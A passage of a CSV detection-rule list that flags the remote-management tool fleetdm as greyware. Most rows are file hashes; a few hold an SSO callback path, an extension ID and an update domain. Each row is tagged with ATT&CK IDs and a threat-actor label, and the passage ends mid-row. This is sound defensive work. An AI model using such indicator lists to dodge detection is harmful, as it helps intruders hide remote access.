"*a2af16bc6414fd3ce32d31efb76128bc14408027e654eada6569ee99df350a35*",".{0,1000}a2af16bc6414fd3ce32d31efb76128bc14408027e654eada6569ee99df350a35.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a3e6acda8965a5770977ec13a0431d2c544d12bc3f0c898a7c76cdf81ae33a69*",".{0,1000}a3e6acda8965a5770977ec13a0431d2c544d12bc3f0c898a7c76cdf81ae33a69.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a41b226ee731ac6c200b17e4367a5f57515f826896aed0a37f0595f9fe68b979*",".{0,1000}a41b226ee731ac6c200b17e4367a5f57515f826896aed0a37f0595f9fe68b979.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a4e6692b22ae9d6e230116f6f530c9775ab4d38743c460dc099f948e92cf075d*",".{0,1000}a4e6692b22ae9d6e230116f6f530c9775ab4d38743c460dc099f948e92cf075d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a5077f2fed33c896f464b7e3122debb2cbf0e3a4a69b848313113f8ec06d1aae*",".{0,1000}a5077f2fed33c896f464b7e3122debb2cbf0e3a4a69b848313113f8ec06d1aae.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a706b0c389ebfbd01cbdf08359c81497eda81c315a7963960ed8968a2173c866*",".{0,1000}a706b0c389ebfbd01cbdf08359c81497eda81c315a7963960ed8968a2173c866.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a7446e282755e5340b33572986e83bffa2a984d04d6f465d0a30da9538f9cea4*",".{0,1000}a7446e282755e5340b33572986e83bffa2a984d04d6f465d0a30da9538f9cea4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a8048a99c160781dd4b323d3751f9717663265416de4495fd9c7227bbee8a2f8*",".{0,1000}a8048a99c160781dd4b323d3751f9717663265416de4495fd9c7227bbee8a2f8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a81e90b8c56431c28537a4232b76cd55cf44217eabc106d359840f10be32d465*",".{0,1000}a81e90b8c56431c28537a4232b76cd55cf44217eabc106d359840f10be32d465.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*a8a9b5fd7a0cc44f6874c90b4170009a46a88adc92367fcafb2acd32958afc98*",".{0,1000}a8a9b5fd7a0cc44f6874c90b4170009a46a88adc92367fcafb2acd32958afc98.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a908c8a15c730ce061360bcbb351135484b0f6e0a1fd19847888818bdab73d86*",".{0,1000}a908c8a15c730ce061360bcbb351135484b0f6e0a1fd19847888818bdab73d86.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a930c85fbceaf955c9ae865893b20a7164b0f8020b0a61ecee56d1a1490cc285*",".{0,1000}a930c85fbceaf955c9ae865893b20a7164b0f8020b0a61ecee56d1a1490cc285.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*a99cbde533415b845c99754a3f454d205d6e31b11fe03e7dca01a8ff32f42646*",".{0,1000}a99cbde533415b845c99754a3f454d205d6e31b11fe03e7dca01a8ff32f42646.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*aaba6ec560adf31f057113fc8c2e0f2387c9643206f9085e4179c109afcdd396*",".{0,1000}aaba6ec560adf31f057113fc8c2e0f2387c9643206f9085e4179c109afcdd396.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*ac1f545786b7014c5a247d8854f114611814ed5f63232a9098f549732fa8814d*",".{0,1000}ac1f545786b7014c5a247d8854f114611814ed5f63232a9098f549732fa8814d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*ac6ea42ae4f70b4b8bc0f1c0f6e453447d97c0f13eb5e2e1621765b304e43cdb*",".{0,1000}ac6ea42ae4f70b4b8bc0f1c0f6e453447d97c0f13eb5e2e1621765b304e43cdb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*af1fa340c0d3690024a828f2099482530d20351bafcd114860b7faf37ddf11cb*",".{0,1000}af1fa340c0d3690024a828f2099482530d20351bafcd114860b7faf37ddf11cb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*api/v1/fleet/sso/callback*",".{0,1000}api\/v1\/fleet\/sso\/callback.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*b069bee7a2a19e296886fb26862e7432e0b2a0fbde72db072f369a0c0e990955*",".{0,1000}b069bee7a2a19e296886fb26862e7432e0b2a0fbde72db072f369a0c0e990955.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*b11045e6accfd5cfa54afed6cfdfc2203873efe7541aa5a93f920d71d3a517b0*",".{0,1000}b11045e6accfd5cfa54afed6cfdfc2203873efe7541aa5a93f920d71d3a517b0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*b31716aa1e425286ea9372e2f72fa7e99e5df62dbe9ac54838d55a877a45abe1*",".{0,1000}b31716aa1e425286ea9372e2f72fa7e99e5df62dbe9ac54838d55a877a45abe1.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*b3f41948b9d55320be0884cdf9634a30089348e31bcb8a6675f75094167c741e*",".{0,1000}b3f41948b9d55320be0884cdf9634a30089348e31bcb8a6675f75094167c741e.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*b4aa7c480ce02aeb723529ed5e8c2874738ca4d2aeb9e718cdc96c5e5cbded3b*",".{0,1000}b4aa7c480ce02aeb723529ed5e8c2874738ca4d2aeb9e718cdc96c5e5cbded3b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*b7678c523152e65ff7b537cafde3fd5ef076ea35e59c3c9148b44a7e6aee796d*",".{0,1000}b7678c523152e65ff7b537cafde3fd5ef076ea35e59c3c9148b44a7e6aee796d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*b8e073c828b106964df38c2a16c30d9acae5aac15a2b4204f084bdf2579c3145*",".{0,1000}b8e073c828b106964df38c2a16c30d9acae5aac15a2b4204f084bdf2579c3145.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*b9ccd13469c5223264dd92b763eff1f27dedd86aa9a2068a08fadce9527e7e71*",".{0,1000}b9ccd13469c5223264dd92b763eff1f27dedd86aa9a2068a08fadce9527e7e71.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*b9eb20c7cddd46e2b79c6dab5f85943439333c710bdf6d27fe930a44a6ccb042*",".{0,1000}b9eb20c7cddd46e2b79c6dab5f85943439333c710bdf6d27fe930a44a6ccb042.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*ba2b81d69ca915132c560a787698e84bf530236a234dd7163e391feb82858bb0*",".{0,1000}ba2b81d69ca915132c560a787698e84bf530236a234dd7163e391feb82858bb0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*bd7c78ae36f84966ffd5effbb9f9227d1a018d8cdb51a2e4e883d4d113453304*",".{0,1000}bd7c78ae36f84966ffd5effbb9f9227d1a018d8cdb51a2e4e883d4d113453304.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*bf2893ace82d8952c00dfaefc48cfb09e2d58fc2cf3553aadfdc250f4b03ccbd*",".{0,1000}bf2893ace82d8952c00dfaefc48cfb09e2d58fc2cf3553aadfdc250f4b03ccbd.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*bfb8b8f3ed04f539f694f140dcf8fdbe07b4e96dfcf8fea3d555d1b69e14b384*",".{0,1000}bfb8b8f3ed04f539f694f140dcf8fdbe07b4e96dfcf8fea3d555d1b69e14b384.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*bfcf0d230e85b0d06d5fc6f19042169d856d2e6dd9a38214721a4cf97ae63af2*",".{0,1000}bfcf0d230e85b0d06d5fc6f19042169d856d2e6dd9a38214721a4cf97ae63af2.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*bfleegjcoffelppfmadimianphbcdjkb*",".{0,1000}bfleegjcoffelppfmadimianphbcdjkb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*c08fd251db2d48d9eb48583b3b2209a8efda571ec6cdff6c7ebb22667ce3d360*",".{0,1000}c08fd251db2d48d9eb48583b3b2209a8efda571ec6cdff6c7ebb22667ce3d360.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*c0ac4e96a2e27335de61a6ada3e55f96d66b9b01b7728456b93ba23a394183a8*",".{0,1000}c0ac4e96a2e27335de61a6ada3e55f96d66b9b01b7728456b93ba23a394183a8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*c0f76101eeb0225230ebae6e980fc1161eb5b3727c8d1fd9ccfe3ac1169ba5b7*",".{0,1000}c0f76101eeb0225230ebae6e980fc1161eb5b3727c8d1fd9ccfe3ac1169ba5b7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*c18e861f5e44c1b731f14ddebcbbe4f6d4bd9ad24e71b49feb7d1ddde7cc1741*",".{0,1000}c18e861f5e44c1b731f14ddebcbbe4f6d4bd9ad24e71b49feb7d1ddde7cc1741.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*c1ec990cba4b1e813de9ebc1bdf540bc5dada5d5521d3a339361d04c8d92c742*",".{0,1000}c1ec990cba4b1e813de9ebc1bdf540bc5dada5d5521d3a339361d04c8d92c742.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*c22224a6e32bc2f071373a53c528513f993239f3a3bc52bfb0ed3d854fba86b5*",".{0,1000}c22224a6e32bc2f071373a53c528513f993239f3a3bc52bfb0ed3d854fba86b5.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*c29a459fab2edd0e81e797886daa70c210bb123e55331416cb6f5bd74bef0e6a*",".{0,1000}c29a459fab2edd0e81e797886daa70c210bb123e55331416cb6f5bd74bef0e6a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*c38560c8536e3c4b0d7a072e373009b03aaf63e58114deef576808c82eb62596*",".{0,1000}c38560c8536e3c4b0d7a072e373009b03aaf63e58114deef576808c82eb62596.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*c488cce70defe02c6a90ebdfe276d88f4fdaab9264e157588bdb0e6dba9c5a91*",".{0,1000}c488cce70defe02c6a90ebdfe276d88f4fdaab9264e157588bdb0e6dba9c5a91.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*c5185db5e8a84cb5fcad17d8501c2fd8aadb451d5c54fdda88af3504b4c850df*",".{0,1000}c5185db5e8a84cb5fcad17d8501c2fd8aadb451d5c54fdda88af3504b4c850df.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*c678c9a61d0faf3f0e030010615c3cca395d815f8c073ea171b20d4bdf221192*",".{0,1000}c678c9a61d0faf3f0e030010615c3cca395d815f8c073ea171b20d4bdf221192.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*c7bdf687d8aff0ab4ddb28fa9c633f416ae82b201f3c51898136c9a26631a7f1*",".{0,1000}c7bdf687d8aff0ab4ddb28fa9c633f416ae82b201f3c51898136c9a26631a7f1.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*c8d5f96c3f1d9054427004f52d87d081f0bd05e4f104eaee857c10bab7400c2d*",".{0,1000}c8d5f96c3f1d9054427004f52d87d081f0bd05e4f104eaee857c10bab7400c2d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*ce4fc109fa3b38b58035b1274318e8db4eac26aee424d0ae4fc8d4113146db52*",".{0,1000}ce4fc109fa3b38b58035b1274318e8db4eac26aee424d0ae4fc8d4113146db52.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*cf51ff263c4171a25b93703cad922ad1f4ca4a43eb93f4b4b6129a774acccefe*",".{0,1000}cf51ff263c4171a25b93703cad922ad1f4ca4a43eb93f4b4b6129a774acccefe.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*cfa2c04ccd3a209c5a01db6de5b393dc2f1f038add46d45e957490c990a47c62*",".{0,1000}cfa2c04ccd3a209c5a01db6de5b393dc2f1f038add46d45e957490c990a47c62.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*commanderupdate.fleetdeck.io*",".{0,1000}commanderupdate\.fleetdeck\.io.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*d12ea4fbcf04a2b0d848ed5b610b78055558e95b7cfd6461ee2e81ba4a7216b5*",".{0,1000}d12ea4fbcf04a2b0d848ed5b610b78055558e95b7cfd6461ee2e81ba4a7216b5.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*d1a23b9adddc0a6dc7806cb8fb9db94adc7263f2712f379dafe654ed38fc6bec*",".{0,1000}d1a23b9adddc0a6dc7806cb8fb9db94adc7263f2712f379dafe654ed38fc6bec.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*d3881b865311e774107ee50db4ee9a27cce669ccdd40e92c1990c4f1ec73e523*",".{0,1000}d3881b865311e774107ee50db4ee9a27cce669ccdd40e92c1990c4f1ec73e523.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*d44e3a415d99266b1759d1e452d3cf115ae01acb822bdff471f19f90c2cf7426*",".{0,1000}d44e3a415d99266b1759d1e452d3cf115ae01acb822bdff471f19f90c2cf7426.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*d7102b8487a285583c69c54bf0bb7a40148eee6050e45ced1d0380bf83ae7aaa*",".{0,1000}d7102b8487a285583c69c54bf0bb7a40148eee6050e45ced1d0380bf83ae7aaa.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*ddfb0598ad97db5738e82403d0e932d2df9591e7e2998f425b56360b75d56c71*",".{0,1000}ddfb0598ad97db5738e82403d0e932d2df9591e7e2998f425b56360b75d56c71.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*de04a4f93837236a62fcd753c4ae7f64ebdbd8880ee2faffd0b950dcc2bc744b*",".{0,1000}de04a4f93837236a62fcd753c4ae7f64ebdbd8880ee2faffd0b950dcc2bc744b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*de4be9f031e2d9d10bcc70a409aaa0e5d311460828d2c6a5404deaa4f7da98ea*",".{0,1000}de4be9f031e2d9d10bcc70a409aaa0e5d311460828d2c6a5404deaa4f7da98ea.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*de7cab0e59a003edd943523dfefa1d038ee1edd914548625fa97324ce680516b*",".{0,1000}de7cab0e59a003edd943523dfefa1d038ee1edd914548625fa97324ce680516b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*def26f6de141f3f90c975923f007cd0acf66422357d9dc78bbb2bdba3f7184a5*",".{0,1000}def26f6de141f3f90c975923f007cd0acf66422357d9dc78bbb2bdba3f7184a5.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*df1ecdc0031475f4481f32911d5222f265ca016bc23a2ce5febe24339f473c02*",".{0,1000}df1ecdc0031475f4481f32911d5222f265ca016bc23a2ce5febe24339f473c02.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*e010e0aa32e87164f562b23b09290e0cb1dd3a634beab90c015a7f6db2afc295*",".{0,1000}e010e0aa32e87164f562b23b09290e0cb1dd3a634beab90c015a7f6db2afc295.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 